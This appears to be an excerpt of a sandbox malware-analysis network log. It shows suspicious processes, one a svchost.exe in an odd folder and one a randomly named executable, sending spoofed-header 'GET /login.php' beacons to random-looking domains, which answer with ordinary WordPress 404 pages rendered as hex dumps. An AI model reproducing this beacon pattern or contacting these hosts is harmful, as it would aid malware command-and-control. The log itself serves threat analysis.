2024-11-11 17:13:31 UTC	1369	IN	Data Raw: 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 Data Ascii: splay:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;t
2024-11-11 17:13:31 UTC	1369	IN	Data Raw: 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 Data Ascii: ilt:not(.i-amphtml-layout-container)>,[layout]:not([layout=container]):not(.i-amphtml-element)>,[width][height][heights]:not([layout]):not(.i-amphtml-element)>,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>{display:none}amp-img:not(.i-a
2024-11-11 17:13:31 UTC	1369	IN	Data Raw: 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 Data Ascii: ottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red
2024-11-11 17:13:31 UTC	1369	IN	Data Raw: 6f 77 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 Data Ascii: ow:hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	63440	188.114.96.3	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:32 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-11-11 17:13:35 UTC	1088	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:13:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="41.6",amp_style_sanitizer;dur="16.6",amp_tag_and_attribute_sanitizer;dur="19.0",amp_optimizer;dur="23.0" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BtLlicqq7lwrcabfKo41kf1arEExdlQf0CCUzJJJCa1NYQzQ3I9zQTU3Nxa8FFv4wLTukG5zPhEhmpSodxeuIaTC4NxUBhFE0L3RpV%2Flt2x%2BvjuzLBqtg3NmsHORaQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe9db09718c6c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1457&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=1983561&cwnd=250&unsent_bytes=0&cid=2cd5e7095c09ced0&ts=2640&x=0"
2024-11-11 17:13:35 UTC	281	IN	Data Raw: 37 63 31 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62 Data Ascii: 7c1e<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
2024-11-11 17:13:35 UTC	1369	IN	Data Raw: 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 Data Ascii: et="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100
2024-11-11 17:13:35 UTC	1369	IN	Data Raw: 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 Data Ascii: ng:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{vi
2024-11-11 17:13:35 UTC	1369	IN	Data Raw: 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 Data Ascii: 0%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-typ
2024-11-11 17:13:35 UTC	1369	IN	Data Raw: 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 Data Ascii: ml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;posit
2024-11-11 17:13:35 UTC	1369	IN	Data Raw: 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b Data Ascii: :none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;
2024-11-11 17:13:35 UTC	1369	IN	Data Raw: 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d Data Ascii: ot(.i-amphtml-layout-container)>,[layout]:not([layout=container]):not(.i-amphtml-element)>,[width][height][heights]:not([layout]):not(.i-amphtml-element)>,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>{display:none}amp-img:not(.i-amphtm
2024-11-11 17:13:35 UTC	1369	IN	Data Raw: 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f Data Ascii: :0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!impo
2024-11-11 17:13:35 UTC	1369	IN	Data Raw: 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b Data Ascii: dden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accordion{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	63493	188.114.97.3	443	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:39 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-11-11 17:13:40 UTC	956	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:13:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5CbZyqIewK0BXTil6DYd6vHzigsUrto13tlOGyHMuE1a7PUCQuWg1%2BaQiVM6aUUzL%2B%2BwNl9Ro6gU4Hd6Ma1439se%2BidLwh%2B%2BA3SCQlUdVwaNLi9N%2FRFOzAQc7pCIhg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fea03ce1318d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1281&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=2229407&cwnd=247&unsent_bytes=0&cid=d725e913d631f272&ts=1633&x=0"
2024-11-11 17:13:40 UTC	413	IN	Data Raw: 37 63 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7ca2<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-11-11 17:13:40 UTC	1369	IN	Data Raw: 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 Data Ascii: }</style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><me
2024-11-11 17:13:40 UTC	1369	IN	Data Raw: 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e Data Ascii: ;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.
2024-11-11 17:13:40 UTC	1369	IN	Data Raw: 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d Data Ascii: defined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=
